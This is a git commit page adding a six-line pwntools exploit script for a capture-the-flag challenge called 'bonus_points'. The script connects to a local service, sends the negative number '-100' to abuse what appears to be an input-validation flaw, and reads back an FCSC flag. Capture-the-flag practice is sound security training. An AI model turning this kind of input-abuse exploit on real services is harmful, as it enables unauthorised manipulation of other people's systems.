added all ctfs
This commit is contained in:
6
hackerpole/pwn/bonus_points/exploit.py
Normal file
6
hackerpole/pwn/bonus_points/exploit.py
Normal file
@@ -0,0 +1,6 @@
|
||||
from pwn import remote, log
|
||||
|
||||
with remote("localhost", 4000, fam="ipv4") as p:
|
||||
p.recvuntil(b"?\n")
|
||||
p.sendline(b"-100")
|
||||
log.info(p.recvregex("FCSC\{[0-9a-fA-F]{64}\}"))
|
||||
Reference in New Issue
Block a user